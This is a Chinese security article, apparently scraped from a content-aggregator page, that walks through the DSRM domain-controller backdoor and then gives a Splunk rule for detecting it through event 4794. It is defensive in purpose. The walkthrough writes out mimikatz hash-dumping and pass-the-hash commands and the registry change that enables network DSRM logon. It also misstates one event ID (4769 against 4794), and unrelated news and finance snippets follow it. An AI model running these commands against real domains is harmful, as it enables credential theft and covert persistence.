基于AD Event日志实时检测DSRM后门-关注
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
01、简介
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
(资料图片)
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
弱电工程简单合同范本有:合同编号:_________甲方:_________地址:_________电话:_________联系人:_________传真:_________邮编:_________乙
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
记得点击 "欢少的成长之路 ",设为星标⭐后台点击【联系我】,申请加入优质技术学习社群大家好,我是Leo。好久没有输出技术理论了,实在是忙。
2022年12月15日至16日举行的中央经济工作会议指出:“当前中国经济恢复的基础尚不牢固,需求收缩、供给冲击、预期转弱三重压力仍然较大。”这
盛弘股份公布2022年度业绩预告,报告期归母净利润为1 95亿元–2 45亿元,同比增长71 88%-115 95%。截至2023年1月9日收盘,盛弘股份(30
有。84消毒液有12个月的保质期。84消毒液是一种以次氯酸钠为主要成分的消毒剂,主要用于物体表面和环境等的消毒,具有较强的氧化性以及腐蚀性
睿智医药(SZ300149,收盘价:10 58元)1月9日发布公告称,2023年2月8日(星期三)下午14:30,公司将在上海市浦东新区张江高科技园区金科路2829号
盒马鲜生盈利了!出品|电商行业作者|航叔盒马鲜生实现盈利盒马鲜生盈利了!1月3日消息,盒马CEO侯毅日前发布全员内部信,对刚刚过去的2022年进
两手油、一身灰,28年间日常穿梭在航空试验一线,钻研航空武器悬挂发射装置产品的研制和批产工作,盯紧“毫厘之间”,保障“国
事发于今日(9日)凌晨约4时30分,2名男子企图盗窃一间位于红磡船坞街的珠宝行,正撬开店铺电闸掣箱欲入内搜掠,被埋伏的警员抓捕
壹网壹创:拟8925万元向关联方转让所持浙江上佰12 75%股权
北京市2023年度电力市场化直接交易圆满完成年度中长期交易成交电量255 61亿千瓦时为深入贯彻国家电力体制改革精神,落实2023年电力中长期合同
广州市癫痫治疗哪家比较好_癫痫是一种顽固的疾病,希望能根除癫痫患者。朋友们应该为癫痫选择合适的治疗方法。癫痫很久以前就治不好了。以前的
乐居财经彦杰1月6日,天健集团公告,第八届董事会第七十六次会议审议通过了《关于公司及控股子公司与深圳壹创国际设计股份有限公司股东方签署
公司目前生产经营一切正常,并已预约于2023年4月24日披露2022年年度报告
同花顺数据中心显示,创力集团1月5日获融资买入783 69万元,占当日买入金额的54 99%,当前融资余额2 49亿元,占流通市值的7%,超过历史70%分位
千山万水总是情,关注一波行不行!NBA本赛季的征程已经达到三分之一左右,就目前各支球队的表现作为评判的标准,来分析一下休赛期各支球队休赛
行政拘留一般是不会被单位开除的,单位以员工被行政拘留为由,与员工解除劳动合同是不可取的。行政拘留的法律流程为:1、公安机关依法受理报案、
说到加湿器的好处,一般人能想到的作用就是提高空气湿度,最直观的感受就是皮肤没那么容易干燥,嘴唇也不容易干燥起皮。但事实上,提高空气湿
2023年01月05日公告发布
每经AI快讯,有投资者在投资者互动平台提问:黄酒现在刚好是销售最旺的季节,公司又是黄酒的龙头企业,除了在京东、天猫、抖音、快手等线上平
以下是农尚环境在北京时间1月4日14:48分盘口异动快照:1月4日,农尚环境盘中快速上涨,5分钟内涨幅超过2%,截至14点48分,报15 34元,成交8185
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
2023年1月3日和而泰融资净偿还626 43万元,融资余额6 03亿元
Copyright 2015-2022 今日酒业网 版权所有 备案号:沪ICP备2022005074号-40 联系邮箱:5 85 59 73 @qq.com